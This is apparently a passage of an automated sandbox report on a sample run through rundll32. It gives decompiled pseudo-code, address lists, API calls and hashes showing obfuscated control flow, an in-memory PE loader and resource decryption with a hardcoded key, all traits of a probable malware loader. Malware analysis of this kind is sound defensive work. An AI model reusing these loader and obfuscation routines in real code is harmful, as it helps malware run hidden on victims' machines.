							if(_t1225 == 0x1e57e2ba) {
								_t1144 = E00254B41();
								__eflags = _t1144;
								if(_t1144 == 0) {
									goto L112;
								}
								_t1144 = E002584C4(_v360);
								_t1225 = 0x1b19f75b;
								continue;
							}
							__eflags = _t1225 - 0x21c9d3c7;
							if(_t1225 == 0x21c9d3c7) {
								_t1336 = _v524;
								_t1144 = E00253FE7( &_v124, _t1336, _v240,  &_v140);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L95;
								}
								_t1144 = E002567E9();
								__eflags = _v116;
								_t1225 = 0x10f69b27;
								if(__eflags != 0) {
									__eflags = _v116 - 7;
									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
								}
								continue;
							}
							__eflags = _t1225 - 0x21caf663;
							if(_t1225 != 0x21caf663) {
								break;
							}
							_t1336 = _v444;
							_t1144 = E0024F536(_v368, _t1336, _v532, _v132);
							_t1225 = 0x7ff6f9b;
						}
						__eflags = _t1225 - 0x3adf5394;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x00242c69
0x00242c6f
0x00242c7d
0x00242c88
0x00242c8d
0x00242c97
0x00242c9c
0x00242ca2
0x00242ca7
0x00242caf
0x00242cba
0x00242ccd
0x00242cd0
0x00242cd7
0x00242ce2
0x00242ced
0x00242cf8
0x00242d0e
0x00242d15
0x00242d20
0x00242d2b
0x00242d3a
0x00242d3f
0x00242d48
0x00242d50
0x00242d5b
0x00242d66
0x00242d6e
0x00242d79
0x00242d8b
0x00242d8e
0x00242d9d
0x00242da4
0x00242daf
0x00242dc2
0x00242dc9
0x00242dd4
0x00242ddf
0x00242dea
0x00242df5
0x00242e00
0x00242e0b
0x00242e16
0x00242e21
0x00242e2c
0x00242e34
0x00242e3f
0x00242e4a
0x00242e55
0x00242e5d
0x00242e68
0x00242e73
0x00242e7e
0x00242e89
0x00242e94
0x00242e9f
0x00242eac
0x00242eb7
0x00242ec2
0x00242ecd
0x00242ed8
0x00242ee3
0x00242eee
0x00242ef9
0x00242f01
0x00242f0c
0x00242f17
0x00242f2c
0x00242f2f
0x00242f30
0x00242f37
0x00242f42
0x00242f4d
0x00242f58
0x00242f6e
0x00242f75
0x00242f80
0x00242f8b
0x00242f96
0x00242fa1
0x00242fac
0x00242fb7
0x00242fbf
0x00242fca
0x00242fd2
0x00242fda
0x00242fdf
0x00242fe7
0x00242fef
0x00242ffa
0x00243005
0x00243010
0x00243025
0x0024302c
0x00243037
0x00243042
0x0024304d
0x00243058
0x00243063
0x00243076
0x0024307d
0x00243088
0x00243093
0x0024309e
0x002430a9
0x002430b4
0x002430c6
0x002430c9
0x002430d0
0x002430db
0x002430e6
0x002430f3
0x002430f7
0x002430ff
0x00243104
0x0024310c
0x00243117
0x00243122
0x0024312d
0x00243138
0x0024314b
0x00243154
0x0024315f
0x00243167
0x0024316f
0x00243177
0x0024317c
0x00243184
0x00243192
0x00243197
0x002431a1
0x002431a4
0x002431ad
0x002431b1
0x002431b9
0x002431cc
0x002431d3
0x002431de
0x002431e9
0x002431f4
0x002431ff
0x00243207
0x00243212
0x0024321d
0x00243228
0x00243230
0x0024323b
0x00243246
0x00243251
0x0024325c
0x00243267
0x00243272
0x0024327a
0x00243285
0x00243290
0x00243298
0x002432a3
0x002432ab
0x002432b6
0x002432c1
0x002432c9
0x002432d4
0x002432df
0x002432ea
0x002432f5
0x00243300
0x0024330b
0x00243316
0x0024331e
0x00243329
0x00243334
0x00243347
0x0024334e
0x00243359
0x00243364
0x0024336f
0x0024337a
0x00243385
0x00243390
0x0024339b
0x002433a6
0x002433ae
0x002433b9
0x002433c1
0x002433ce
0x002433d2
0x002433da
0x002433e2
0x002433ed
0x002433f5
0x00243402
0x0024340d
0x00243418
0x00243423
0x0024342e
0x00243439
0x00243444
0x0024344f
0x00243457
0x00243465
0x0024346a
0x00243470
0x00243474
0x0024347c
0x00243487
0x00243492
0x0024349d
0x002434a8
0x002434b3
0x002434bb
0x002434c3
0x002434c8
0x002434d0
0x002434db
0x002434e6
0x002434f1
0x002434fc
0x0024350e
0x00243513
0x0024351c
0x00243527
0x00243532
0x0024353d
0x00243548
0x00243550
0x0024355b
0x00243566
0x00243571
0x0024357c
0x00243587
0x0024358f
0x0024359a
0x002435a2
0x002435af
0x002435b0
0x002435b4
0x002435bc
0x002435c4
0x002435cf
0x002435da
0x002435e5
0x002435f0
0x002435fb
0x00243606
0x00243611
0x00243619
0x0024361e
0x00243626
0x0024362b
0x00243633
0x00243647
0x0024364e
0x00243656
0x00243661
0x00243669
0x00243679
0x0024367e
0x00243684
0x0024368c
0x00243699
0x0024369c
0x002436a0
0x002436a8
0x002436b0
0x002436b8
0x002436c3
0x002436ce
0x002436d9
0x002436e4
0x002436ef
0x002436f7
0x00243702
0x0024370d
0x00243723
0x0024372a
0x00243735
0x00243740
0x0024374d
0x00243750
0x0024375c
0x00243760
0x00243765
0x0024376d
0x00243778
0x00243780
0x0024378b
0x0024379e
0x0024379f
0x002437a6
0x002437ae
0x002437b9
0x002437c1
0x002437c6
0x002437cb
0x002437d0
0x002437d8
0x002437e3
0x002437f6
0x002437fd
0x00243808
0x00243810
0x00243818
0x0024381d
0x00243822
0x0024382a
0x0024383d
0x0024384d
0x00243854
0x0024385f
0x0024386a
0x00243875
0x0024387d
0x00243888
0x00243890
0x0024389d
0x002438a1
0x002438a9
0x002438b3
0x002438be
0x002438c9
0x002438d1
0x002438dc
0x002438e4
0x002438e9
0x002438f1
0x002438f9
0x00243901
0x0024390c
0x00243917
0x00243922
0x0024392d
0x00243938
0x00243940
0x0024394b
0x00243953
0x00243958
0x00243960
0x00243965
0x0024396d
0x00243978
0x00243980
0x0024398b
0x00243993
0x0024399b
0x002439a9
0x002439ae
0x002439b4
0x002439bc
0x002439c4
0x002439c9
0x002439d1
0x002439d9
0x002439e1
0x002439f4
0x002439f7
0x002439fe
0x00243a09
0x00243a14
0x00243a1f
0x00243a2a
0x00243a35
0x00243a3d
0x00243a48
0x00243a53
0x00243a5e
0x00243a74
0x00243a82
0x00243a87
0x00243a90
0x00243a9b
0x00243aa6
0x00243ab1
0x00243abc
0x00243ac8
0x00243acb
0x00243acf
0x00243adc
0x00243ae0
0x00243ae8
0x00243b00
0x00243b09
0x00243b14
0x00243b1f
0x00243b2a
0x00243b35
0x00243b40
0x00243b53
0x00243b54
0x00243b5b
0x00243b63
0x00243b6e
0x00243b81
0x00243b90
0x00243b97
0x00243ba2
0x00243bad
0x00243bc1
0x00243bd0
0x00243bd7
0x00243be2
0x00243bef
0x00243bf3
0x00243bfd
0x00243c01
0x00243c09
0x00243c11
0x00243c16
0x00243c1e
0x00243c26
0x00243c2e
0x00243c41
0x00243c48
0x00243c53
0x00243c5e
0x00243c69
0x00243c71
0x00243c79
0x00243c7e
0x00243c86
0x00243c8e
0x00243c99
0x00243ca4
0x00243caf
0x00243cba
0x00243cc5
0x00243ccd
0x00243cd8
0x00243ce3
0x00243ceb
0x00243cf6
0x00243d01
0x00243d14
0x00243d23
0x00243d2a
0x00243d32
0x00243d3d
0x00243d48
0x00243d50
0x00243d5b
0x00243d66
0x00243d6e
0x00243d7b
0x00243d8f
0x00243d9b
0x00243da2
0x00243dad
0x00243db8
0x00243dc3
0x00243dce
0x00243dd9
0x00243de4
0x00243df9
0x00243e01
0x00243e08
0x00243e13
0x00243e2a
0x00243e2e
0x00243e36
0x00243e3b
0x00243e43
0x00243e56
0x00243e65
0x00243e6c
0x00243e77
0x00243e7f
0x00243e87
0x00243e8f
0x00243e97
0x00243e9f
0x00243eaa
0x00243eb2
0x00243ec6
0x00243ecd
0x00243ed8
0x00243ee3
0x00243ef6
0x00243efd
0x00243f08
0x00243f08
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00243f19
0x00243f19
0x00244295
0x00244297
0x002442cb
0x002442d4
0x002442dc
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00000000
0x00243f13
0x00243f0d
0x002442a7
0x002442b0
0x002442b2
0x0024411e
0x0024411e
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00000000
0x00243f13
0x00000000
0x00243f0d
0x00243f1f
0x00243f25
0x00244129
0x0024412f
0x002441a9
0x002441af
0x00244278
0x0024427f
0x00000000
0x0024427f
0x002441b5
0x002441bb
0x0024424e
0x00244255
0x00000000
0x00244255
0x002441bd
0x002441c3
0x00244214
0x0024421f
0x00244227
0x00000000
0x00244227
0x002441c5
0x002441cb
0x00000000
0x00000000
0x002441df
0x002441e8
0x002441f0
0x00000000
0x002441f0
0x00244131
0x00244837
0x00244851
0x00244858
0x00244858
0x00244137
0x0024413d
0x0024419a
0x0024419f
0x00000000
0x0024419f
0x0024413f
0x00244145
0x00244184
0x00244189
0x00000000
0x00244189
0x00244147
0x0024414d
0x0024416c
0x00000000
0x0024416c
0x0024414f
0x00244155
0x00000000
0x00000000
0x00244162
0x00000000
0x00244162
0x00243f2b
0x0024410d
0x00244116
0x00244118
0x00244118
0x00000000
0x00244118
0x00243f31
0x00243f37
0x00243ffd
0x00244003
0x002440ea
0x002440f5
0x002440fc
0x00000000
0x002440fc
0x00244009
0x0024400f
0x002440c9
0x002440ce
0x002440d5
0x00000000
0x002440d5
0x00244015
0x0024401b
0x0024405c
0x00244069
0x00244074
0x00244079
0x0024407c
0x0024407e
0x002440b4
0x002440b4
0x00000000
0x002440b4
0x00244080
0x00244096
0x0024409d
0x002440a3
0x002440aa
0x00000000
0x002440aa
0x0024401d
0x00244023
0x00000000
0x00000000
0x00244034
0x00244042
0x0024404b
0x0024404b
0x00000000
0x0024404b
0x00243f3d
0x00243fee
0x00243ff3
0x00000000
0x00243ff3
0x00243f49
0x00243fdd
0x00000000
0x00243fdd
0x00243f55
0x00243fc7
0x00243fcc
0x00243fd3
0x00000000
0x00243fd3
0x00243f5d
0x00243faf
0x00000000
0x00243faf
0x00243f65
0x00243f98
0x00243f9d
0x00243f9f
0x00000000
0x00243fa5
0x00243fa5
0x00000000
0x00243fa5
0x00243f9f
0x00243f6d
0x00000000
0x00243f73
0x00243f81
0x00243f86
0x00000000
0x00243f86
0x002442e7
0x002442e7
0x002442ed
0x00244632
0x00244638
0x00244736
0x0024473c
0x00244818
0x0024481d
0x00000000
0x0024481d
0x00244742
0x00244748
0x002447b9
0x002447dc
0x002447e1
0x002447f2
0x00244800
0x00244807
0x00000000
0x00244807
0x0024474a
0x00244750
0x00244778
0x00244783
0x00000000
0x00244783
0x00244752
0x00244758
0x00000000
0x00000000
0x00244769
0x0024476e
0x00000000
0x0024476e
0x0024463e
0x0024471a
0x00244725
0x0024472c
0x00000000
0x0024472c
0x00244644
0x0024464a
0x002446f7
0x002446fc
0x002446fe
0x00000000
0x00000000
0x00244704
0x00000000
0x00244704
0x00244650
0x00244656
0x002446d2
0x002446e0
0x00000000
0x002446e6
0x00244658
0x0024465e
0x0024468a
0x00244691
0x00244697
0x00244699
0x0024469b
0x002446a3
0x002446b3
0x002446ba
0x002446ba
0x00000000
0x002446ba
0x00244660
0x00244666
0x00000000
0x00000000
0x00244670
0x00244675
0x00000000
0x00244675
0x002442f3
0x0024461d
0x00244628
0x00000000
0x00244628
0x002442f9
0x002442ff
0x00244463
0x00244469
0x0024453f
0x0024454d
0x00244551
0x00244558
0x0024455f
0x00244567
0x00244568
0x0024456d
0x00244570
0x00244572
0x002445c8
0x002445fb
0x00244600
0x00244605
0x00244610
0x00244615
0x00244574
0x00244578
0x002445a2
0x002445a7
0x002445ac
0x002445b3
0x002445b5
0x002445b7
0x002445bc
0x002445bc
0x00243f08
0x00243f08
0x00000000
0x00243f08
0x00243f08
0x0024446f
0x00244475
0x002444f3
0x0024451d
0x00244522
0x00244527
0x0024452e
0x00244530
0x00244532
0x00244537
0x00000000
0x00244537
0x00244477
0x0024447d
0x002444d6
0x002444db
0x002444e2
0x00000000
0x002444e2
0x0024447f
0x00244485
0x00000000
0x00000000
0x00244499
0x002444ac
0x002444b5
0x002444bd
0x00000000
0x002444bd
0x00244305
0x002443e8
0x002443e8
0x002443ea
0x0024441b
0x00244427
0x0024442e
0x00244437
0x0024443e
0x00244440
0x00000000
0x00000000
0x0024444a
0x0024444f
0x00244451
0x00244459
0x00244459
0x00000000
0x00244459
0x00244453
0x00000000
0x00000000
0x00244455
0x00244457
0x00000000
0x00000000
0x00000000
0x00244457
0x002443ec
0x002443ec
0x00000000
0x002443ec
0x0024430b
0x0024430d
0x0024484c
0x00000000
0x0024484c
0x00244313
0x00244319
0x002443c3
0x002443c8
0x002443ca
0x00000000
0x00000000
0x002443d7
0x002443dc
0x00000000
0x002443dc
0x0024431f
0x00244325
0x0024436c
0x00244377
0x0024437e
0x00244380
0x00000000
0x00000000
0x00244394
0x00244399
0x002443a1
0x002443a6
0x002443ac
0x002443b4
0x002443b4
0x00000000
0x002443a6
0x00244327
0x0024432d
0x00000000
0x00000000
0x0024433e
0x0024434c
0x00244353
0x00244353
0x00244822
0x00244822
0x00000000
0x0024482e

Strings

yI, xrefs: 00243251
+!, xrefs: 00243B63
bY, xrefs: 002432DF
\$, xrefs: 00243ED8
G", xrefs: 00243A2A
n\, xrefs: 00243C8E
o, xrefs: 00242E21
kU, xrefs: 002434E6
71##, xrefs: 002442F9
;R,], xrefs: 002435E5
P&, xrefs: 00242ED8
[ , xrefs: 00242E3F
nlvJ, xrefs: 002435B4
d3, xrefs: 0024347C
C!), xrefs: 002438BE
71##, xrefs: 00244459
k, xrefs: 00243246
D>, xrefs: 002439E1
}%, xrefs: 002439D9
=<, xrefs: 00242D79
u, xrefs: 00243D3D
q, xrefs: 002437D8
,Bb*, xrefs: 00243C7E
c, xrefs: 00243CBA
);, xrefs: 00243DA2
FM, xrefs: 00243E77
71##, xrefs: 0024404B
0vkX, xrefs: 00242EEE
ny, xrefs: 00243B6E
=, xrefs: 002433B9
T5W, xrefs: 00243C53
D'k., xrefs: 00244783
o4-(, xrefs: 00243FDD
nY, xrefs: 00243ABC
o4-(, xrefs: 0024446F
QG)}, xrefs: 0024316F
jd, xrefs: 00243184
I], xrefs: 0024378B
D'k., xrefs: 002442E7
71##, xrefs: 00244532
7Y, xrefs: 0024340D
DP, xrefs: 00243CD8
~, xrefs: 00243633

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-1872862241
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: 1253c6dfe33466d024844c5777399262d83214f8663d231665bcdaee2281d9d3
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: 8ED212715193818BE378DF25C58ABDFBBE1BBC4304F10891DE19A862A0DBB49959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9

Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29

LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
_memmove.LIBCMT ref: 1000139C
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5

Strings

ntdll.dll, xrefs: 1000120F
LdrAccessResource, xrefs: 10001282
jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx, xrefs: 1000134C
Control_RunDLL, xrefs: 100013CB
LdrFindResource_U, xrefs: 10001241

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
API String ID: 2007481169-3150289311
Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70

Uniqueness

Uniqueness Score: -1.00%

Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}

0x10001b37
0x10001b3b
0x10001b3d
0x10001b43
0x10001b57
0x10001b62
0x10001b79
0x10001b84
0x00000000
0x10001b86
0x10001b8d
0x10001b90
0x00000000
0x10001ba3
0x10001ba3
0x10001ba3
0x10001ba8
0x10001ba8
0x10001bae
0x10001bb0
0x10001bb3
0x10001bb5
0x10001bb5
0x10001bb5
0x10001bb8
0x10001bbc
0x10001bc3
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bc7
0x10001bca
0x10001bcd
0x10001bcd
0x10001bb5
0x10001bd3
0x10001bd4
0x10001bd9
0x10001bdc
0x10001bdf
0x10001be2
0x10001be5
0x10001be8
0x10001bec
0x10001bf2
0x10001c12
0x10001c15
0x10001c1b
0x10001c1d
0x10001c22
0x10001c3c
0x10001c47
0x10001c4d
0x10001c51
0x10001c73
0x10001c76
0x10001c83
0x10001c89
0x10001c8f
0x10001c95
0x10001c9b
0x10001ca1
0x10001ca4
0x10001cb1
0x10001db9
0x10001db9
0x00000000
0x10001cb7
0x10001cbe
0x10001cc2
0x10001cc8
0x10001ccb
0x10001cd1
0x10001ce2
0x10001ce4
0x10001cec
0x10001cef
0x10001cf2
0x10001cf9
0x00000000
0x10001cff
0x10001d04
0x10001d04
0x10001d07
0x10001d0a
0x10001d1a
0x10001d0c
0x10001d15
0x10001d15
0x10001d2b
0x10001dbc
0x10001dbf
0x10001dcc
0x10001d31
0x10001d34
0x10001d3b
0x00000000
0x10001d49
0x10001d4b
0x10001d50
0x10001da7
0x10001db6
0x10001d52
0x10001d52
0x10001d58
0x10001d99
0x10001da4
0x10001d5a
0x10001d5a
0x10001d5c
0x10001d5e
0x10001d67
0x10001d87
0x10001d96
0x10001d69
0x10001d6e
0x10001d77
0x10001d84
0x10001d84
0x10001d67
0x10001d58
0x10001d50
0x10001d3b
0x10001d2b
0x10001cf9
0x10001c53
0x10001c5a
0x00000000
0x10001c5a
0x10001c24
0x10001c2d
0x10001c33
0x10001c35
0x10001c3a
0x10001c60
0x10001c62
0x10001c70
0x00000000
0x00000000
0x00000000
0x10001c3a
0x10001bf4
0x10001bf9
0x10001c07
0x10001c07
0x10001bf2
0x10001b90
0x10001b64
0x10001b64
0x10001b69
0x10001b76
0x10001b76
0x10001b45
0x10001b45
0x10001b47
0x10001b54
0x10001b54

APIs

SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00254B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00254B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
